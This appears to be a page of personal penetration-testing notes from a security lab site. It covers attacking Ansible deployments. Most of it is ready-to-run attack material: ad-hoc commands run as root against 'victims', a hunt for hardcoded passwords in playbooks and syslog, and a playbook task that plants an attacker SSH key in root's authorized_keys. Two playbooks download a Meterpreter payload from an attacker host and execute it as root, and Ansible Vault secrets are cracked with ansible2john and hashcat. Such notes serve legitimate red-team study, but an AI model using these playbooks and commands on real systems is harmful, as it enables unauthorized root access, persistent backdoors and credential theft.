AJ-Labz
  • whoami
  • The Lab
    • Building the Lab
      • Physical Hardware
      • ESXi
        • Install ESXi without a keyboard
      • vCenter Server Installation
      • Configure vCenter Datacenter
      • Virtual Networking
      • Install Virtual Machine
      • Install Virtual Firewall
      • Increasing VM Harddrive size
    • Building the Windows Domain
    • Building a Local DNS Server
    • Installing Apache Guacamole
    • Installing WireGuard VPN
    • Industrial Control Systems (ICS)
  • Defensive Cyberz
  • Analytic Repo
    • Beacon Detection
  • Creating an SIEM
    • Installing Security Onion (SO)
    • Splunk
    • Getting the Windows Data You Need
  • Zeek || Bro
    • Bro/Zeek Script
    • Installing Protocol Analyzers
  • Offensive Cyberz
    • Cobalt Strike Red Team Cheat Sheet
    • Defense Evasion
      • Evading Defender with CobaltStrike
      • Disable AV
      • AMSI Bypass
      • Evade Heuristic Behaviors
        • Process Injection
        • Process Hollowing
        • Reflection
        • AppLocker Bypass
        • Powershell CLM Bypass
      • Linux Shellcode Encoders
    • AD Enumeration
      • AD Tools
      • PowerView
      • BloodHound
      • DAFT Commands
      • Enumeration Commands
    • AD Attack
      • Prompt for Credentials
      • LAPS Reader
      • Abusing ACLs
    • Command and Control
      • Covenant Framework
      • Simple HTTPS Server
    • Linux
      • Shells
      • Impacket
      • SSH
      • Kerberos Cache File
      • Ansible
      • Privilege Escalation
    • Phishing
      • LNK Script
    • Wireless Attacks
    • Create a Trojan
  • Cyber Readingz
    • Recommended Readings
Powered by GitBook
On this page
  • Enumerating Ansible
  • Attack Vectors
  • Ansible Playbooks
  • Exploiting Playbooks
  • root
  • not root
  • Adding tasks if writable
  • Ansible Vault
  • Ansible Data Leakage

Was this helpful?

  1. Offensive Cyberz
  2. Linux

Ansible

Enumerating Ansible

  • Is Ansible in use? (Server)

ansible

ls /etc/ansible

grep ansible /etc/passwd

  • Identify Ansible nodes (Client)

grep ansible /etc/passwd

Attack Vectors

  • Initiated from server

  • ad-hoc commands

  • playbooks

  • Running ansible commands

su ansibleadm

ansible victims -a "whoami"

  • running as root the name victims comes from the /etc/ansible/hosts file so adjust as needed

ansible victims -a "whoami" --become

ansible appservers -a "whoami"

Ansible Playbooks

  • Running playbooks

ansible-playbook [playbookname.yml]

Exploiting Playbooks

root

  • run playbooks as the ansible user

not root

  • search for hardcoded creds in playbooks

    • ansible_become_pass

    • /var/log/syslog | grep for pass

Adding tasks if writable

- name: Get system info
	hosts: all
	gather_facts: true
	become: yes
	tasks:
		- name: Display info
		  debug:
			msg: "The hostname is {{ ansible_hostname }} and the OS is {{ansible_distribution }}"

		- name: Create a directory if it does not exist
			file:
				path: /root/.ssh
				state: directory
				mode: '0700'
				owner: root
				group: root
				
		- name: Create authorized keys if it does not exist
			file:
				path: /root/.ssh/authorized_keys
				state: touch
				mode: '0600'
				owner: root
				group: root
				
		- name: Update keys
			lineinfile:
				path: /root/.ssh/authorized_keys
				line: "ssh-rsa AAAAB3NzaC1...Z86SOm..."
				insertbefore: EOF

  • Reverse Meterpreter

- name: Meterpreter reverse tcp
  hosts: linuxvictim
  gather_facts: true
  become: yes
  become_user: root
  tasks:
  - name: Run command
    shell: "mkdir /tmp/shell"
    async: 10
    poll: 0
  - name: Run command
    shell: "wget http://192.168.X.Y/final.out -P /tmp/shell/"
    async: 10
    poll: 0
  - name: Run command
    shell: "chmod +x /tmp/shell/final.out "
    async: 10
    poll: 0
  - name: Run command
    shell: "/tmp/shell/final.out &"
    async: 10

  • or

- name: Meterpreter reverse tcp
  hosts: linuxvictim
  gather_facts: true
  become: yes
  become_user: root
  tasks:
  - name: Run command
    shell: "mkdir /tmp/shell && wget http://192.168.X.Y/final.out -P /tmp/shell/ && chmod +x /tmp/shell/final.out && /tmp/shell/final.out &"   
    async: 10
    poll: 0

Ansible Vault

  • Copy encrypted password

  • use ansible2john.py

  • returns string for hashcat to use

python3 /usr/share/john/ansible2john.py ./test.yml > ans2johnhash.txt

  • copy string into testhash.txt

  • then run hashcat

hashcat testhash.txt --force --hash-type=16900 /usr/share/wordlists/rockyou.txt

  • copy original vault string to text file and use ansible-vault decrypt with the discovered password

cat pw.txt | ansible-vault decrypt

Ansible Data Leakage

  • leak to /var/log/syslog

  • Cleartext in playbooks

  • unless nolog is set in the playbook

PreviousKerberos Cache FileNextPrivilege Escalation

Last updated 3 years ago

Was this helpful?